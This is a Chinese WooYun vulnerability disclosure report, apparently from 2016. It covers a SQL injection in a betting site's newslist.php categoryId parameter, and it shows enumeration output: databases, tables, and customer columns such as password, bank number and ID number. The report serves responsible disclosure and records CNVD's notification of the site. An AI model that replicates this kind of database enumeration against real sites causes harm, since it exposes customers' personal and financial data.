乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-04-30: 细节已通知厂商并且等待厂商处理中 2016-05-05: 厂商已经确认,细节仅向厂商公开 2016-05-15: 细节向核心白帽子及相关领域专家公开 2016-05-25: 细节向普通白帽子公开 2016-06-04: 细节向实习白帽子公开 2016-06-19: 细节向公众公开
我也来一发 不知道重复没~
http://**.**.**.**/news/newslist.php?categoryId=15
available databases [7]:[*] bbs[*] caiso[*] information_schema[*] mysql[*] performance_schema[*] test[*] tubiaoDatabase: caiso[86 tables]+------------------------------+| account || accountlog || activity_activities || activity_activity_detail || admin_channel || admin_class || admin_permissions || admin_role || admin_role_function || admin_sendsomething_template || admin_syslogs || admin_user || admin_winprize || agent || bankcardInfo || business_activity_partner || business_article || business_article_category || business_article_inlink || business_article_partner || business_back_money_request || business_chase || business_chaseitem || business_city_no || business_community || business_company || business_cps_day_report || business_customer || business_customer_commission || business_email || business_email_log || business_feedback || business_filedownlod || business_friendly_link || business_league || business_league_rank || business_match_arrange || business_match_history || business_match_mapping || business_match_team_mapping || business_mobile || business_odd || business_order || business_order_queue || business_order_temp || business_part || business_partner || business_pay || business_pay_out_request || business_payment_request || business_plan || business_plan_item || business_print_term || business_prize_level || business_recharge_gift || business_restricted || business_sms_log || business_sms_mo_log || business_sms_partner || business_soft_update || business_spread_channel || business_supplier || business_sys_account || business_sys_account_log || business_system_param || business_team || business_term || business_term_type_config || business_ticket || business_wallet || business_wallet_log || business_win_describe_order || business_win_describe_ticket || business_win_prize || business_you_hui_ma || member || memberinfo || memberlog || membershare || mibaoinfo || odds || point || pointlog || sequence || sessions || sm_queue |+------------------------------+
Database: caisoTable: business_customer[52 columns]+--------------------+---------------+| Column | Type |+--------------------+---------------+| admin_user_id | bigint(20) || all_win_money | decimal(19,2) || ask | varchar(255) || bank | int(11) || bank_name | varchar(255) || bank_number | varchar(255) || bound | varchar(255) || channel_id | bigint(20) || city | varchar(255) || commission_id | bigint(20) || credent_no | varchar(255) || credent_type | int(11) || customer_ip | varchar(255) || customer_type | int(11) || email | varchar(255) || email_accept | varchar(255) || id | bigint(20) || is_apply | bit(1) || is_pass | int(11) || last_login_time | datetime || login_num | int(11) || mobile_no | varchar(255) || nick_name | varchar(255) || old | int(11) || open_id | varchar(255) || password | varchar(255) || ploy_accur | bigint(20) || ploy_consumed | bigint(20) || province | varchar(255) || question | varchar(255) || real_name | varchar(255) || reg_channel | int(11) || reg_source | int(11) || register_time | datetime || remarks | varchar(255) || sms_accept | varchar(255) || sssuper_commission | decimal(19,2) || sssuper_ratio | decimal(19,2) || sssuperior | bigint(20) || ssuper_commission | decimal(19,2) || ssuper_ratio | decimal(19,2) || ssuperior_id | bigint(20) || status | int(11) || subbranch | varchar(255) || super_commission | decimal(19,2) || super_ratio | decimal(19,2) || superior_id | bigint(20) || user3_id | varchar(255) || usr_type | int(11) || wake_up_email_num | int(11) || wallet_id | bigint(20) || yanzhenma | varchar(255) |+--------------------+---------------+
时间问题 不继续深入了~
危害等级:中
漏洞Rank:10
确认时间:2016-05-05 19:48
CNVD未直接复现所述情况,已由CNVD通过网站管理方公开联系渠道向其邮件通报,由其后续提供解决方案。
暂无